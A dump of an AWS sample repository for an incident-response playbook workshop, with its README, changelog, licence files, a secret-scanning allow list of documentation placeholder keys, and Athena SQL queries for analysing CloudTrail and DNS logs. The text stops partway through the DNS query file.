├── .gitallowed ├── .gitignore ├── CHANGELOG.md ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── NOTICE ├── README.md ├── analytics ├── cloudtrail │ └── cloudtrail_demo_queries.sql ├── dns │ └── dns_demo_queries.sql └── vpcflow │ └── vpcflow_demo_queries.sql ├── app.py ├── cdk.json ├── cdk.out └── WorkshopStack.yaml ├── package.json ├── playbooks ├── README.md ├── credential_exposure │ ├── IAM_credential_exposure.md │ ├── containment │ │ ├── iam_containment_policy.json │ │ └── s3_bucket_containment_policy.json │ ├── evidence │ │ └── stuff │ ├── images │ │ ├── aws_caf.png │ │ └── nist_life_cycle.png │ └── simulation │ │ ├── simulate_credential_exposure_activity.sh │ │ └── undo_simulate_credential_exposure_activity.sh ├── crypto_mining │ ├── EC2_crypto_mining.md │ ├── containment │ │ └── iam_containment_policy.json │ ├── images │ │ ├── aws_caf.png │ │ └── nist_life_cycle.png │ ├── response_scripts │ │ └── retrieve_guardduty_findings.sh │ └── simulation │ │ ├── simulate_crypto_mining_activity.sh │ │ ├── undo_simulate_crypto_mining_activity.sh │ │ └── userdata.sh └── template │ ├── images │ ├── aws_caf.png │ └── nist_life_cycle.png │ └── threat_name.md ├── readme-images └── diagram.png ├── remove_cdk_metadata.sh ├── requirements.txt ├── setup.py └── workshop_stack.py /.gitallowed: -------------------------------------------------------------------------------- 1 | 777777777777 2 | AIDACKCEVSQ6C2EXAMPLE 3 | AKIAIOSFODNN7EXAMPLE 4 | AKIAI44QH8DHBEXAMPLE 5 | ANPAJ2UCCR6DPCEXAMPLE 6 | ANPAJ4AE5446DAEXAMPLE 7 | APKAEIBAERJR2EXAMPLE 8 | APKAEIVFHP46CEXAMPLE 9 | wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 10 | je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY 11 | 1234567890abcdef0 12 | abcdef01234567890 13 | 021345abcdef6789 14 | i-021345abcdef678[a-z] 15 | .git/* -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | cdk.context.json 2 | *.swp 3 | package-lock.json 4 | __pycache__ 5 | .pytest_cache 6 | .env 7 | .venv 8 | *.egg-info 9 | .idea 10 | .idea/* 11 | **/.DS_Store 12 | cdk.out/*.out 13 | cdk.out/*.json 14 | .vscode 15 | node_modules 16 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Version [1.3] - 2024-02-17 2 | 3 | ## Changes 4 | 5 | ### Workshop stack 6 | * Upgraded to AWS CDK version 2.128 7 | * Created CfnParameter for Athena Engine Version 8 | * Set Athena Engine Version as 3 9 | 10 | ### Playbooks 11 | * Not applicable 12 | 13 | # Version [1.2] - 2023-08-14 14 | 15 | ## Changes 16 | 17 | ### WorkShop Stack 18 | * Updated base role from `TeamRole` to `WSParticipantRole` to be used in AWS Workshop Studio events 19 | * Upgraded to AWS CDK version `2.91.0` 20 | 21 | ### Playbooks 22 | * Not applicable 23 | 24 | # Version [1.1] - 2023-07-07 25 | 26 | ## Changes 27 | 28 | ### WorkShop Stack 29 | * Upgraded to AWS CDK version `2.87.0` 30 | * EC2 instance type changed to `t3.small` 31 | * Removed CDK metadata from cdk.out/WorkshopStack.yaml 32 | * Added script for CDK metadata from CloudFormation template for direct deployment to CloudFormation without using AWS CDK 33 | 34 | ### Playbooks 35 | * Not applicable 36 | 37 | # Version [1.0] - 2023-05-25 38 | 39 | ## Changes 40 | 41 | ### WorkShop Stack 42 | * Upgraded to AWS CDK v2 43 | * Updated AWS CDK constructs to new version 44 | * EC2 instance connect via AWS Systems Manager 45 | * EC2 instance opened to the internet for simulations 46 | * S3 Buckets using new defaults (no ACL, no Public Access) 47 | * Added [permissions](https://docs.aws.amazon.com/guardduty/latest/ug/security_iam_id-based-policy-examples.html#guardduty_enable-permissions) to enable GuardDuty to the Security Deploy role 48 | 49 | ### Playbooks 50 | * Not applicable 51 | 52 | # Version [0.9] - 2021-11-24 53 | 54 | ## Changes 55 | 56 | ### WorkShop Stack 57 | * Added CloudShell entitlements to all roles 58 | 59 | ### Playbooks 60 | * Not applicable 61 | 62 | # Version [0.8] - 2021-11-19 63 | 64 | ## Changes 65 | 66 | ### WorkShop Stack 67 | * Not applicable 68 | 69 | ### Playbooks 70 | * added to simulation folder scripts to remove resources created by simulation 71 | 72 | # Version [0.7] - 2021-11-15 73 | 74 | ## Changes 75 | 76 | ### WorkShop Stack 77 | * Not applicable 78 | 79 | ### Playbooks 80 | * Comments added to simulation scripts 81 | 82 | # Version [0.6] - 2021-11-09 83 | 84 | ## Changes 85 | 86 | ### WorkShop Stack 87 | * CloudFormation parameter changed to accept IAM User or Role as the principal to assume Security role 88 | 89 | ### Playbooks 90 | * Typo with `aws s3 rb` command results 91 | 92 | # Version [0.5] - 2021-11-01 93 | 94 | ## Changes 95 | 96 | ### WorkShop Stack 97 | * Added ReadOnlyAccess permissions to SecurityDeployRole 98 | 99 | ### Playbooks 100 | * Added IAM entitlements required to run playbook 101 | 102 | 103 | # Version [0.4] - 2021-10-27 104 | 105 | ## Changes 106 | 107 | ### WorkShop Stack 108 | * Added cloudshell and cloudformation permissions to SecurityDeployRole 109 | 110 | 111 | # Version [0.3] - 2021-10-13 112 | 113 | ## Changes 114 | 115 | ### CoreStack 116 | * Removed GuardDuty 117 | * Removed GuardDuty IAM Policy statement 118 | 119 | # Version [0.2] - 2021-08-05 120 | 121 | ## Changes 122 | 123 | ### CoreStack 124 | * Policy change for Deploy Role 125 | * Removed unnecessary code comments 126 | * Playbook grammar and syntax fixes 127 | 128 | # Version [0.1] - 2021-07-22 129 | 130 | ## Features added 131 | 132 | ### CoreStack 133 | * CloudTrail logging to S3 bucket 134 | * VPC Flow logging to S3 Bucket 135 | * DNS logging to S3 Bucket 136 | * GuardDuty enabled 137 | * Athena Workgroup 138 | * Glue database and tables for all log types 139 | * IAM Role for Athena administration 140 | * IAM Role for security analyst to use Athena 141 | 142 | ### SimulationStack 143 | * IAM User Access Keys for crypto mining playbook simulation 144 | * IAM User Access Keys for exposed credential playbook simulation 145 | 146 | ### Playbooks 147 | * Credential exposure 148 | * Crypto mining 149 | * Template 150 | 151 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | ## Code of Conduct 2 | This project has adopted the [Amazon Open Source Code of Conduct](https://aws.github.io/code-of-conduct). 3 | For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq) or contact 4 | opensource-codeofconduct@amazon.com with any additional questions or comments. 5 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing Guidelines 2 | 3 | Thank you for your interest in contributing to our project. Whether it's a bug report, new feature, correction, or additional 4 | documentation, we greatly value feedback and contributions from our community. 5 | 6 | Please read through this document before submitting any issues to ensure we have all the necessary 7 | information to effectively respond to your bug report or contribution. 8 | 9 | 10 | ## Reporting Bugs/Feature Requests 11 | 12 | We welcome you to use the GitHub issue tracker to report bugs or suggest features. 13 | 14 | When filing an issue, please check existing open, or recently closed, issues to make sure somebody else hasn't already 15 | reported the issue. Please try to include as much information as you can. Details like these are incredibly useful: 16 | 17 | * A reproducible test case or series of steps 18 | * The version of our code you have used 19 | * Any modifications you've made relevant to the bug 20 | * Anything unusual about your environment or deployment 21 | 22 | 23 | ## Code of Conduct 24 | This project has adopted the [Amazon Open Source Code of Conduct](https://aws.github.io/code-of-conduct). 25 | For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq) or contact 26 | opensource-codeofconduct@amazon.com with any additional questions or comments. 27 | 28 | 29 | ## Security issue notifications 30 | If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/). Please do **not** create a public github issue. 31 | 32 | 33 | ## Licensing 34 | 35 | See the [LICENSE](LICENSE) file for our project's licensing. We will ask you to confirm the licensing of your contribution. 36 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this 4 | software and associated documentation files (the "Software"), to deal in the Software 5 | without restriction, including without limitation the rights to use, copy, modify, 6 | merge, publish, distribute, sublicense, and/or sell copies of the Software, and to 7 | permit persons to whom the Software is furnished to do so. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, 10 | INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A 11 | PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT 12 | HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 13 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 14 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -------------------------------------------------------------------------------- /NOTICE: -------------------------------------------------------------------------------- 1 | Building Incident Response Playbooks in AWS 2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Building Incident Response Playbooks for AWS 2 | 3 | This project is part of the workshop [Building Incident Response Playbooks for AWS](https://aws-incident-response-playbooks.workshop.aws). Follow the workshop directions for optimal use of this repository contents. 4 | 5 | ## DO NOT DEPLOY THE CODE FROM THIS REPOSITORY IN AN EXISTING AWS ACCOUNT YOU CURRENTLY USE. CREATE A NEW SANDBOX ACCOUNT FOR THE PURPOSE OF THIS WORKSHOP. 6 | 7 | ## Sandbox environment 8 | * This is a sandbox environment for learning purposes only. You will take the learnings from building a playbook in this controlled environment and adapt to your own environment. 9 | * GuardDuty, CloudTrail, VPC Flow, and DNS logs are the fundamental pillars for threat detection and incident response in AWS. Focus on learning how to interpret them based on the activity generated. 10 | 11 | ## Solving customer challenges around incident response in AWS 12 | * This project builds an environment in an AWS Account facilitating the development of playbooks enhancing customer's capability to respond to security events. 13 | * [Amazon Athena](https://aws.amazon.com/athena/) provides analytical capabilities with pre-configured tables for querying [AWS CloudTrail](https://aws.amazon.com/cloudtrail/) logs, [Amazon VPC Flow logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html), and [Amazon Route53 VPC DNS logs](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-query-logs.html) centralized in An Amazon S3 Bucket. 14 | * Includes two (2) sample playbook addressing the `IAM credential exposure`, and `EC2 crypto mining` threats, plus a `template` for you to develop additional scenarios. 15 | * Includes Linux bash scripts to simulate the threats and practice the response laid out by the sample playbooks. Create your own scripts in Linux bash or other languages to support the development and testing of your own security event scenarios. 16 | 17 | * * * 18 | 19 | ## Architecture Overview 20 | 21 | An AWS CDK application creates one stack named `WorkshopStack` containing the minimum environment required to support the development of Incident Response Playbooks. The components are listed in the next section. 22 | 23 | 24 | ### WorkshopStack components: 25 | * Amazon S3 Bucket centralizing all required log sources 26 | * Amazon S3 Bucket for Athena queries results 27 | * A VPC with public and private subnets, internet gateway, NAT gateway, and one EC2 instance 28 | * CloudTrail trail logging management and data events streaming to S3 bucket 29 | * VPC DNS logs enabled for VPC streaming to S3 bucket 30 | * VPC Flow logs enabled for VPC streaming to S3 bucket 31 | * Athena Workgroup 32 | * Glue database and tables 33 | * Security analyst IAM Role to run Athena queries 34 | * Athena administrator IAM Role to configure Athena and Glue 35 | * Security break glass IAM Role for containment, eradication, and recovery 36 | * Security deploy IAM Role for CloudFormation deployment of SimulationStack 37 | * IAM User Access Key for EC2 crypto mining simulation 38 | * IAM User Access Key for IAM credential exposure simulation 39 | * AWS GuardDuty for alerting (enabled manually) 40 | 41 | ![Image](readme-images/diagram.png) 42 | 43 | * * * 44 | 45 | ## Deployment 46 | * Clone this repository and choose between [AWS CDK](https://docs.aws.amazon.com/cdk/latest/guide/home.html) or [AWS CloudFormation](https://aws.amazon.com/cloudformation/) for deployment of stacks. 47 | 48 | ### CloudFormation 49 | Preferred deployment method for those with little coding and AWS experience. 50 | * Login to your AWS Account 51 | * Go to the [AWS CloudFormation console](https://console.aws.amazon.com/cloudformation) 52 | * Create stack using cdk/cdk.out/WorkshopStack.yaml from the cloned repository 53 | 54 | Refer to this page for getting started with [AWS CloudFormation](https://aws.amazon.com/cloudformation/getting-started/). 55 | 56 | ### AWS CDK 57 | We recommend this method for those with excellent coding and AWS experience. 58 | * Install `node v18` 59 | * check version running `node --version` 60 | * Install `Python 3.10` 61 | * check version running `python --version` 62 | * Configure a python virtual environment 63 | * change directory to the root of the cloned repository 64 | * run `python3 -m venv .venv` 65 | * run `source .venv/bin/activate` 66 | * run `python -m pip install -r stacks/requirements.txt` 67 | * Install node modules 68 | * run `npm i` 69 | * Install [AWS CLI v2](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) 70 | * Create IAM credentials with permission to deploy AWS resources using CloudFormation 71 | * Configure `AWS CLI` with IAM credentials 72 | * run `aws configure` 73 | * verify by running `aws sts get-caller-identity` 74 | * Deploy the AWS CDK app 75 | * run `cdk bootstrap` 76 | * run `cdk synth` 77 | * run `cdk deploy` 78 | 79 | Refer to this page for getting started with [AWS CDK](https://docs.aws.amazon.com/cdk/latest/guide/getting_started.html) 80 | 81 | * * * 82 | 83 | ## Cost 84 | 85 | Consider the costs involved in deploying this solution beyond what is included with [AWS Free Tier](https://aws.amazon.com/free/), if applicable: 86 | 87 | * Amazon Athena: https://aws.amazon.com/athena/pricing/ 88 | * Amazon S3: https://aws.amazon.com/s3/pricing/ 89 | * Amazon EC2: https://aws.amazon.com/ec2/pricing 90 | * AWS CloudTrail: https://aws.amazon.com/cloudtrail/pricing/ 91 | * AWS Glue: https://aws.amazon.com/glue/pricing/ 92 | * AWS GuardDuty (manual install): https://docs.aws.amazon.com/guardduty/latest/ug/monitoring_costs.html 93 | * * * 94 | 95 | 96 | ## Related Resources 97 | 98 | ### AWS resources 99 | * [AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework) 100 | * [AWS re:invent 2020: Building your cloud incident response program](https://www.youtube.com/watch?v=MW7kcXL6OVo) 101 | * [AWS Incident Response Playbook Samples (process only)](https://github.com/aws-samples/aws-incident-response-playbooks) 102 | * [AWS Cloud Adoption Framework Security Perspective](https://d0.awsstatic.com/whitepapers/AWS_CAF_Security_Perspective.pdf) 103 | * [AWS Well-Architected labs - Security](https://wellarchitectedlabs.com/security/) 104 | * [AWS Security Analytics Bootstrap](https://github.com/awslabs/aws-security-analytics-bootstrap) 105 | * [AWS API Guides and Documentation](https://docs.aws.amazon.com/index.html) 106 | * [CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html) 107 | * [Amazon VPC Flow Logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html) 108 | * [Amazon Route53 VPC DNS resolver logs](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver.html) 109 | 110 | ### Third-party resources 111 | * [NIST Computer Security Incident Handling Guide (Special Publication 800-61 Revision 2)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) 112 | 113 | * * * -------------------------------------------------------------------------------- /analytics/cloudtrail/cloudtrail_demo_queries.sql: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | SPDX-License-Identifier: MIT-0 4 | */ 5 | 6 | -- PREVIEW TABLE 7 | -- preview first 10 rows with all fields, quick way to verify everything is setup correctly 8 | 9 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 10 | LIMIT 10; 11 | 12 | -- PARTITION TESTS 13 | /* NOTE: if there are no constraints a partition (account, region, or date) then by default ALL data will be scanned 14 | this could lead to costly query, always consider using at least one partition constraint. 15 | 16 | Note that this is the case even if you have other constraints in a query (e.g. sourceipaddress = '192.0.2.1'), 17 | only constraints using partition fields (date_partition, region_partition, account_partition) 18 | will limit the amount of data scanned. 19 | */ 20 | 21 | -- preview first 10 rows with all fields, limited to a single account 22 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 23 | WHERE account_partition = '111122223333' 24 | LIMIT 10; 25 | 26 | -- preview first 10 rows with all fields, limited to multiple accounts 27 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 28 | WHERE account_partition in ('111122223333','444455556666','123456789012') 29 | LIMIT 10; 30 | 31 | -- preview first 10 rows with all fields, limited to a single region 32 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 33 | WHERE region_partition = 'us-east-1' 34 | LIMIT 10; 35 | 36 | -- preview first 10 rows with all fields, limited to multiple regions 37 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 38 | WHERE region_partition in ('us-east-1','us-east-2','us-west-2') 39 | LIMIT 10; 40 | 41 | -- NOTE: date_partition format is 'YYYY/MM/DD' as a string 42 | -- preview first 10 rows with all fields, limited to a certain date range 43 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 44 | WHERE date_partition >= '2021/07/01' 45 | AND date_partition <= '2021/07/31' 46 | LIMIT 10; 47 | 48 | -- preview first 10 rows with all fields, limited to the past 30 days (relative) 49 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 50 | WHERE date_partition >= date_format(date_add('day',-30,current_timestamp), '%Y/%m/%d') 51 | LIMIT 10; 52 | 53 | -- preview first 10 rows with all fields, limited by a combination partition constraints 54 | -- NOTE: narrowing the scope of the query as much as possible will improve performance and minimize cost 55 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 56 | WHERE date_partition >= '2021/07/01' 57 | AND date_partition <= '2021/07/31' 58 | AND account_partition = '111122223333' 59 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 60 | LIMIT 10; 61 | 62 | -- ANALYSIS EXAMPLES 63 | -- NOTE: default partition constraints have been provided for each query, 64 | -- be sure to add the appropriate partition constraints to the WHERE clause as shown above 65 | /* 66 | DEFAULT partition constraints: 67 | WHERE date_partition >= '2021/07/01' 68 | AND date_partition <= '2021/07/31' 69 | AND account_partition = '111122223333' 70 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 71 | 72 | Be sure to modify or remove these to fit the scope of your intended analysis 73 | */ 74 | 75 | -- Summary of event counts by Region (e.g. where is the most activity) 76 | SELECT region_partition, count(*) as eventcount FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 77 | WHERE date_partition >= '2021/07/01' 78 | AND date_partition <= '2021/07/31' 79 | AND account_partition = '111122223333' 80 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 81 | GROUP BY region_partition 82 | ORDER BY eventcount DESC 83 | 84 | -- Summary of event count by Region and EventName, ordered by event count (decending) for each region 85 | -- Quick way to identify top EventNames seen in each region 86 | SELECT region_partition, eventname, count(*) as eventcount FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 87 | WHERE date_partition >= '2021/07/01' 88 | AND date_partition <= '2021/07/31' 89 | AND account_partition = '111122223333' 90 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 91 | GROUP BY region_partition, eventname 92 | ORDER BY region_partition, eventcount DESC 93 | 94 | -- User login summary, via AssumeRole or ConsoleLogin 95 | -- includes a list of all source IPs for each user 96 | SELECT useridentity.arn, eventname, array_agg(DISTINCT(sourceipaddress) ORDER BY sourceipaddress) AS sourceips FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 97 | WHERE useridentity.arn IS NOT NULL 98 | AND (eventname = 'AssumeRole' OR eventname = 'ConsoleLogin') 99 | AND date_partition >= '2021/07/01' 100 | AND date_partition <= '2021/07/31' 101 | AND account_partition = '111122223333' 102 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 103 | GROUP BY useridentity.arn, eventname 104 | ORDER BY eventname 105 | 106 | -- User Activity Summary 107 | -- filter high volume read-only GET/LIST/DECRIBE calls 108 | SELECT useridentity.arn, array_agg(DISTINCT(eventname)) AS eventnames, 109 | array_agg(DISTINCT(sourceipaddress) ORDER BY sourceipaddress) AS sourceips, 110 | array_agg(DISTINCT(useragent) ORDER BY useragent) AS useragents FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 111 | WHERE eventname <> 'AssumeRole' 112 | AND eventname NOT LIKE 'Get%' 113 | AND eventname NOT LIKE 'List%' 114 | AND eventname NOT LIKE 'Describe%' 115 | AND date_partition >= '2021/07/01' 116 | AND date_partition <= '2021/07/31' 117 | AND account_partition = '111122223333' 118 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 119 | GROUP BY useridentity.arn 120 | 121 | -- User Activity Summary, including username 122 | -- filter high volume read-only GET/LIST/DECRIBE calls 123 | -- same as above, but will include the ARN or the username (for IAM Users) of the principal 124 | SELECT useridentity.arn, useridentity.username, 125 | array_agg(DISTINCT(eventname) ORDER BY eventname) AS eventnames, 126 | array_agg(DISTINCT(sourceipaddress) ORDER BY sourceipaddress) AS sourceips, 127 | array_agg(DISTINCT(useragent) ORDER BY useragent) AS useragents FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 128 | WHERE eventname <> 'AssumeRole' 129 | AND eventname NOT LIKE 'Get%' 130 | AND eventname NOT LIKE 'List%' 131 | AND eventname NOT LIKE 'Describe%' 132 | AND date_partition >= '2021/07/01' 133 | AND date_partition <= '2021/07/31' 134 | AND account_partition = '111122223333' 135 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 136 | GROUP BY useridentity.arn, useridentity.principalid, useridentity.username 137 | 138 | -- IAM change summary 139 | -- * filter read-only GET/LIST/DESCRIBE 140 | -- * filter unsuccessful calls 141 | SELECT eventtime, useridentity.arn, useridentity.username, eventname, requestparameters 142 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 143 | WHERE eventsource = 'iam.amazonaws.com' 144 | AND eventname NOT LIKE 'Get%' 145 | AND eventname NOT LIKE 'List%' 146 | AND eventname NOT LIKE 'Describe%' 147 | AND errorcode IS NULL 148 | AND date_partition >= '2021/07/01' 149 | AND date_partition <= '2021/07/31' 150 | AND account_partition = '111122223333' 151 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 152 | ORDER BY account_partition, eventtime 153 | 154 | -- Access Key creations with extract of username and keyid 155 | -- * filter unsuccessful calls 156 | SELECT eventtime, useridentity.arn, useridentity.username, eventname, 157 | JSON_EXTRACT_SCALAR(JSON_EXTRACT(responseelements, '$.accessKey'), '$.userName') AS userName, 158 | JSON_EXTRACT_SCALAR(JSON_EXTRACT(responseelements, '$.accessKey'), '$.accessKeyId') AS accessKey 159 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 160 | WHERE eventname = 'CreateAccessKey' 161 | AND errorcode IS NULL 162 | AND date_partition >= '2021/07/01' 163 | AND date_partition <= '2021/07/31' 164 | AND account_partition = '111122223333' 165 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 166 | ORDER BY account_partition, eventtime 167 | 168 | -- Password changes with extract of username 169 | -- * filter unsuccessful calls 170 | SELECT eventtime, useridentity.arn, useridentity.username, eventname, 171 | JSON_EXTRACT_SCALAR(requestparameters, '$.userName') AS "username with password modified" 172 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 173 | WHERE eventname IN ('UpdateLoginProfile', 'CreateLoginProfile') 174 | AND errorcode IS NULL 175 | AND date_partition >= '2021/07/01' 176 | AND date_partition <= '2021/07/31' 177 | AND account_partition = '111122223333' 178 | AND region_partition in ('us-east-1','us-east-2','us-west-2', 'us-west-2') 179 | ORDER BY account_partition, eventtime 180 | 181 | -- Create optimized ORC columnar format table for a single account and region for the past 90 days 182 | -- NOTE: single query limit is 100 partitions, to add additional accounts, regions, or days use the following INSERT INTO method 183 | -- Reference: https://docs.aws.amazon.com/athena/latest/ug/ctas-insert-into.html 184 | CREATE TABLE "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"_orc 185 | WITH (format = 'ORC', orc_compression = 'SNAPPY', partitioned_by = ARRAY['account_partition','region_partition','date_partition'] ) AS 186 | SELECT eventversion, 187 | useridentity, 188 | eventtime, 189 | eventsource, 190 | eventname, 191 | awsregion, 192 | sourceipaddress, 193 | useragent, 194 | errorcode, 195 | errormessage, 196 | requestparameters, 197 | responseelements, 198 | additionaleventdata, 199 | requestid, 200 | eventid, 201 | resources, 202 | eventtype, 203 | apiversion, 204 | readonly, 205 | recipientaccountid, 206 | serviceeventdetails, 207 | sharedeventid, 208 | vpcendpointid, 209 | account_partition, 210 | region_partition, 211 | date_partition 212 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 213 | WHERE account_partition = '111122223333' 214 | AND region_partition = 'us-east-1' 215 | AND date_partition >= date_format(date_add('day',-90,current_timestamp), '%Y/%m/%d') 216 | 217 | -- Add optimized ORC columnar format table for a single account and region for the past 90 days 218 | -- NOTE: single query limit is 100 partitions, to add additional accounts, regions, or days keep using this INSERT INTO method 219 | -- Reference: https://docs.aws.amazon.com/athena/latest/ug/ctas-insert-into.html 220 | INSERT INTO "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"_orc 221 | SELECT eventversion, 222 | useridentity, 223 | eventtime, 224 | eventsource, 225 | eventname, 226 | awsregion, 227 | sourceipaddress, 228 | useragent, 229 | errorcode, 230 | errormessage, 231 | requestparameters, 232 | responseelements, 233 | additionaleventdata, 234 | requestid, 235 | eventid, 236 | resources, 237 | eventtype, 238 | apiversion, 239 | readonly, 240 | recipientaccountid, 241 | serviceeventdetails, 242 | sharedeventid, 243 | vpcendpointid, 244 | account_partition, 245 | region_partition, 246 | date_partition 247 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 248 | WHERE account_partition = '111122223333' 249 | AND region_partition = 'us-east-2' 250 | AND date_partition >= date_format(date_add('day',-90,current_timestamp), '%Y/%m/%d') -------------------------------------------------------------------------------- /analytics/dns/dns_demo_queries.sql: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | SPDX-License-Identifier: MIT-0 4 | */ 5 | 6 | -- PREVIEW TABLE 7 | -- preview first 10 rows with all fields, quick way to verify everything is setup correctly 8 | 9 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 10 | LIMIT 10; 11 | 12 | -- PARTITION TESTS 13 | /* NOTE: if there are no constraints a partition (account, region, or date) then by default ALL data will be scanned 14 | this could lead to costly query, always consider using at least one partition constraint. 15 | 16 | Note that this is the case even if you have other constraints in a query (e.g. sourceaddress = '192.0.2.1'), 17 | only constraints using partition fields (date_partition, region_partition, account_partition) 18 | will limit the amount of data scanned. 19 | */ 20 | 21 | -- preview first 10 rows with all fields, limited to a single account 22 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 23 | WHERE account_partition = '111122223333' 24 | LIMIT 10; 25 | 26 | -- preview first 10 rows with all fields, limited to multiple accounts 27 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 28 | WHERE account_partition in ('111122223333','444455556666','123456789012') 29 | LIMIT 10; 30 | 31 | -- preview first 10 rows with all fields, limited to a single vpc 32 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 33 | WHERE vpc_partition = 'vpc-00000001' 34 | LIMIT 10; 35 | 36 | -- preview first 10 rows with all fields, limited to multiple vpcs 37 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 38 | WHERE vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003') 39 | LIMIT 10; 40 | 41 | -- NOTE: date_partition format is 'YYYY/MM/DD' as a string 42 | -- preview first 10 rows with all fields, limited to a certain date range 43 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 44 | WHERE date_partition >= '2020/07/01' 45 | AND date_partition <= '2020/07/31' 46 | LIMIT 10; 47 | 48 | -- preview first 10 rows with all fields, limited to the past 30 days (relative) 49 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 50 | WHERE date_partition >= date_format(date_add('day',-30,current_timestamp), '%Y/%m/%d') 51 | LIMIT 10; 52 | 53 | -- preview first 10 rows with all fields, limited by a combination partition constraints 54 | -- NOTE: narrowing the scope of the query as much as possible will improve performance and minimize cost 55 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns" 56 | WHERE date_partition >= '2020/07/01' 57 | AND date_partition <= '2020/07/31' 58 | AND account_partition = '111122223333' 59 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003') 60 | LIMIT 10; 61 | 62 | -- ANALYSIS EXAMPLES 63 | 64 | -- Sort queries by requestor instance count and query count 65 | SELECT query_name, query_type, array_distinct(filter(array_agg(srcids), q -> q.instance IS NOT NULL)) as instances, 66 | cardinality(array_distinct(filter(array_agg(srcids), q -> q.instance IS NOT NULL))) as query_count 67 | FROM "irworkshopgluedatabase"."irworkshopgluetabledns" 68 | WHERE date_partition >= '2020/07/01' 69 | AND date_partition <= '2020/07/31' 70 | AND account_partition = '111122223333' 71 | AND vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003') 72 | GROUP BY query_name, query_type 73 | ORDER by query_count DESC; 74 | 75 | -- Summary with count of each time a name name queried 76 | SELECT query_name, query_type, count(*) as query_count FROM "irworkshopgluedatabase"."irworkshopgluetabledns" 77 | WHERE date_partition >= 